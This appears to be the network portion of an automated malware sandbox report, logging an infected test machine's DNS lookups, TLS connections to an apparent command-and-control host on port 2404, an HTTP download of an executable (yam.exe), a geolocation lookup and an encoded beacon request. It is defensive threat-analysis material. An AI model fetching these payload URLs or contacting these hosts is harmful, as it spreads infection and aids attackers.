Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.gg10siyahposet.xyz |
CNAME
gg10siyahposet.xyz
|
31.186.11.254 |
| geoplugin.net | 178.237.33.50 | |
| www.kasoraenterprises.com |
CNAME
kasoraenterprises.com
|
34.102.136.180 |
| top.noforabusers1.xyz | 103.114.163.134 | |
| www.centerverified.online | ||
| www.ehirtt.com |
- TCP Requests
-
-
192.168.56.103:49165 103.114.163.134:2404top.noforabusers1.xyz
-
192.168.56.103:49166 103.114.163.134:2404top.noforabusers1.xyz
-
192.168.56.103:49167 103.114.163.134:2404top.noforabusers1.xyz
-
192.168.56.103:49168 178.237.33.50:80geoplugin.net
-
192.168.56.103:49163 18.190.160.39:80
-
192.168.56.103:49173 31.186.11.254:80www.gg10siyahposet.xyz
-
192.168.56.103:49172 34.102.136.180:80www.kasoraenterprises.com
-
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:50803 239.255.255.250:1900
-
GET
200
http://18.190.160.39/yam/yam.exe
REQUEST
RESPONSE
BODY
GET /yam/yam.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 18.190.160.39
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 13 Mar 2023 00:42:35 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Last-Modified: Sat, 11 Mar 2023 09:37:35 GMT
ETag: "520e7-5f69ca0b44323"
Accept-Ranges: bytes
Content-Length: 336103
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://geoplugin.net/json.gp
REQUEST
RESPONSE
BODY
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
HTTP/1.1 200 OK
date: Mon, 13 Mar 2023 02:12:49 GMT
server: Apache
content-length: 947
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
GET
403
http://www.kasoraenterprises.com/ho62/?-ZYX_nx=ILx0eS9ddKaLXR32wcm3Ge3yfVAzF5408XJt2aWWkfbZxqutDY57VuSUoMZC8CpGzmmcV23v&CxoHs=2djxG
REQUEST
RESPONSE
BODY
GET /ho62/?-ZYX_nx=ILx0eS9ddKaLXR32wcm3Ge3yfVAzF5408XJt2aWWkfbZxqutDY57VuSUoMZC8CpGzmmcV23v&CxoHs=2djxG HTTP/1.1
Host: www.kasoraenterprises.com
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 13 Mar 2023 00:43:20 GMT
Content-Type: text/html
Content-Length: 291
ETag: "64063330-123"
Via: 1.1 google
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.3 192.168.56.103:49165 103.114.163.134:2404 |
None | None | None |
|
TLS 1.3 192.168.56.103:49167 103.114.163.134:2404 |
None | None | None |
|
TLS 1.3 192.168.56.103:49166 103.114.163.134:2404 |
None | None | None |
Snort Alerts
No Snort Alerts